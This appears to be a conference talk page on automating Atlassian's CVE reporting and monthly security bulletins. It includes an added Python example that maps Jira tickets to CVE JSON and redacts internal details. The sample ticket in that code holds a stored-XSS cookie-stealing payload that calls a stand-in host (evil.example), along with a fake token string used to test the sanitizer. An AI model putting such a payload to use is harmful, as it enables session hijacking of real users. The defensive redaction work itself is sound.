Automating CNA CVE Reporting and Monthly Bulletins at Atlassian

Deepak Chintala (Atlassian, US), Zachary Echouafni (Atlassian, US)

Running a CNA program inside a fast‑moving product security organization is hard enough; doing it while coordinating globally distributed engineering teams, multiple scanners, and manual JSON submissions to MITRE is a recipe for burnout and blind spots. At Atlassian, our CVE reporting started as an ad‑hoc, highly manual process: engineers hand‑crafted CVE JSON in MITRE’s GitHub repo, vulnerability data lived in scattered tools, and every disclosure felt like a bespoke project. Coverage was inconsistent, timelines were unpredictable, and the friction made it difficult to scale beyond a handful of teams.

In this talk, I’ll walk through how I evolved that process into a fully automated CNA pipeline integrated with the MITRE CVE Services API and the Atlassian Cloud stack. I’ll show how we built an application on top of Jira and Confluence that lets engineers report CVEs through standard Jira tickets, auto‑drafts vulnerability reports using CVSSv4 vectors, and drives a monthly bulletin process that aggregates CVEs from dozens of engineering teams into a single, ready‑to‑review draft. I’ll dig into the hard parts: sanitizing vulnerability data coming from many scanners and sources, deciding what exploitation detail to include or omit, and building guardrails so we don’t leak sensitive information while still being transparent.

Beyond the tooling, I’ll focus on the operational side. I’ll describe how we aligned product release cycles to a monthly patch timeline that supports coordinated disclosure, and how I built buy‑in with product engineering organizations across multiple geos. That includes establishing monthly on‑call rotations and clear ownership for security bulletins so that CVE reporting is a shared responsibility, not a security‑only burden.

Attendees will leave with practical patterns for using the MITRE CVE Services API from within Jira, turning CVSSv4 data into structured reports, and building the relationships and processes needed to run a sustainable, high‑coverage CNA program.
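The abstract describes three pieces of the pipeline: taking a CVSSv4 vector from a Jira ticket, turning it into a structured CVE record, and applying guardrails so internal detail does not leak into the public advisory. The script below is an added example written for this page, not Atlassian's application or any code from the talk. It validates a CVSS:4.0 vector, applies constructed redaction rules to the ticket description, builds a CVE JSON 5.x CNA container, and shows the shape of a CVE Services submission. The ticket field names, the redaction patterns, the sample ticket and the Jira-to-CVE mapping are all assumptions; the CVE Services endpoint path and `CVE-API-*` headers are as documented for the public API at the time of writing and should be checked against current MITRE documentation before use. The base score is taken from the ticket rather than computed, since the CVSS v4 scoring tables are out of scope here.

```python
"""Jira ticket -> CVE JSON 5.x CNA container, with leak guardrails.

Added example for this page. Field names, redaction rules and the sample
ticket are constructed assumptions, not Atlassian's implementation.
"""
import json
import re
import urllib.request

# CVSS v4.0 base metrics and their legal values (CVSS v4.0 specification).
CVSS4_BASE = {
    "AV": ("N", "A", "L", "P"), "AC": ("L", "H"), "AT": ("N", "P"),
    "PR": ("N", "L", "H"), "UI": ("N", "P", "A"),
    "VC": ("H", "L", "N"), "VI": ("H", "L", "N"), "VA": ("H", "L", "N"),
    "SC": ("H", "L", "N"), "SI": ("H", "L", "N"), "SA": ("H", "L", "N"),
}

# Guardrails (assumed patterns): drop paragraphs an engineer marked as internal
# or that carry exploit detail, strip internal links, redact token-like strings.
DROP_PARA = re.compile(r"^\s*(?:INTERNAL|PoC|Exploit)\b", re.I)
INTERNAL_URL = re.compile(r"https?://[^\s/]*\.(?:internal|corp)\b\S*", re.I)
SECRET_LIKE = re.compile(r"\b(?:ghp_|AKIA|xox[bp]-)[A-Za-z0-9_-]{8,}")


def parse_cvss4_vector(vector: str) -> dict:
    """Validate a CVSS:4.0 vector string and return its base metrics."""
    parts = vector.split("/")
    if parts[0] != "CVSS:4.0":
        raise ValueError("not a CVSS v4.0 vector")
    metrics = {}
    for part in parts[1:]:
        name, _, value = part.partition(":")
        if name not in CVSS4_BASE:
            continue  # threat/environmental/supplemental metrics are not checked here
        if value not in CVSS4_BASE[name]:
            raise ValueError(f"illegal value {value!r} for metric {name}")
        metrics[name] = value
    missing = [m for m in CVSS4_BASE if m not in metrics]
    if missing:
        raise ValueError(f"vector is missing base metrics: {missing}")
    return metrics


def cvss4_severity(score: float) -> str:
    """CVSS v4.0 qualitative severity rating for a numeric base score."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS score out of range")
    if score == 0.0:
        return "NONE"
    if score < 4.0:
        return "LOW"
    if score < 7.0:
        return "MEDIUM"
    if score < 9.0:
        return "HIGH"
    return "CRITICAL"


def sanitize_description(text: str) -> str:
    """Remove internal-only paragraphs, internal links and secrets from a ticket."""
    kept = []
    for para in re.split(r"\n\s*\n", text.strip()):
        if DROP_PARA.match(para):
            continue
        para = INTERNAL_URL.sub("[internal link removed]", para)
        para = SECRET_LIKE.sub("[redacted]", para)
        kept.append(" ".join(para.split()))
    return "\n\n".join(kept)


def build_cna_container(ticket: dict) -> dict:
    """Map an exported Jira ticket (assumed field names) onto a CNA container."""
    parse_cvss4_vector(ticket["cvss_vector"])  # reject malformed vectors early
    score = float(ticket["cvss_score"])
    return {
        "affected": [{
            "vendor": ticket["vendor"], "product": ticket["product"],
            "versions": [{"version": ticket["first_affected"], "lessThan": ticket["fixed_in"],
                          "status": "affected", "versionType": "semver"}],
        }],
        "descriptions": [{"lang": "en", "value": sanitize_description(ticket["description"])}],
        "metrics": [{"format": "CVSS", "cvssV4_0": {
            "version": "4.0", "vectorString": ticket["cvss_vector"],
            "baseScore": score, "baseSeverity": cvss4_severity(score)}}],
        "problemTypes": [{"descriptions": [{"lang": "en", "type": "CWE",
                                            "cweId": ticket["cwe"], "description": ticket["cwe_text"]}]}],
        "references": [{"url": u} for u in ticket["references"]],
    }


def submit_cna_container(cve_id: str, container: dict, org: str, user: str, key: str,
                         base: str = "https://cveawg.mitre.org/api") -> dict:
    """Publish the container to CVE Services (POST /cve/{id}/cna; verify against current docs)."""
    body = json.dumps({"cnaContainer": container}).encode()
    req = urllib.request.Request(f"{base}/cve/{cve_id}/cna", data=body, method="POST",
                                 headers={"Content-Type": "application/json", "CVE-API-ORG": org,
                                          "CVE-API-USER": user, "CVE-API-KEY": key})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


SAMPLE_TICKET = {  # constructed ticket export; the score is an assumed ticket field
    "vendor": "ExampleCo", "product": "Widget Server",
    "first_affected": "8.0.0", "fixed_in": "8.4.2", "cvss_score": 7.1,
    "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N",
    "cwe": "CWE-79", "cwe_text": "Improper Neutralization of Input During Web Page Generation",
    "description": (
        "A stored XSS in the dashboard gadget lets an authenticated user run script in another user's session.\n\n"
        "INTERNAL: found by scanner run 4411, owner is the gadgets team.\n\n"
        "PoC: <script>fetch('https://evil.example/?'+document.cookie)</script>\n\n"
        "Tracking: https://jira.corp.example.internal/browse/SEC-4411 and token ghp_ABCDEFGHIJKLMNOP1234 seen in logs."
    ),
    "references": ["https://example.com/security-bulletin/2025-01"],
}

if __name__ == "__main__":
    print(json.dumps(build_cna_container(SAMPLE_TICKET), indent=2))
```

The guardrails are deliberately simple pattern rules; in practice the allowlist of public hostnames and the list of ticket sections that never leave the company are the policy decisions the talk refers to, and the script only shows where in the pipeline they are enforced. Nothing is sent to MITRE unless `submit_cna_container` is called with real credentials.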

---

Principal Product Security Engineer, Atlassian: Zachary Echouafni is the technical lead for Marketplace Security at Atlassian, owning Atlassian's CNA CVE program, vulnerability scanning, bug bounty and pen testing programs, app security reviews, Trust programs, and partner governance across thousands of external developers. Before Atlassian, he was a Principal Engineer at Dell Secureworks building XDR security products. His path was non-traditional with no formal education. He started hacking, coding and tinkering with robotics at a young age, entered the industry as a systems administrator, founded CDN/DDoS mitigation startup Shovl.io, and held security engineering roles at American Express and Dell. He brings a builder's mindset to security, automating CNA advisory processes to save 60 weeks of security time per year, driving shift-left scanning that blocks critical issues before apps hit the Marketplace, and architecting trust programs that raise the bar across the ecosystem.

Senior Manager, Product Security, Atlassian: Deepak Chintala leads Atlassian's Marketplace and Ecosystem Security team, a founding member of the group who joined in 2020 as an IC tech lead before growing into the team's engineering manager. His team of nine engineers owns the end-to-end security posture of the Atlassian Marketplace including application security automation, vulnerability management, incident response, and security architecture for the Forge platform. Previously he spent nearly five years on Visa's Product Security and Architecture team focused on SSDLC, code reviews, and security automation. He holds a Master's degree from Carnegie Mellon University. Deepak's leadership centers on scaling security through automation and AI, managing critical trust programs and marketplace risk reduction, and mentoring the next generation of security talent.

Video: Automating CNA CVE Reporting and Monthly Bulletins at Atlassian, from the FIRST channel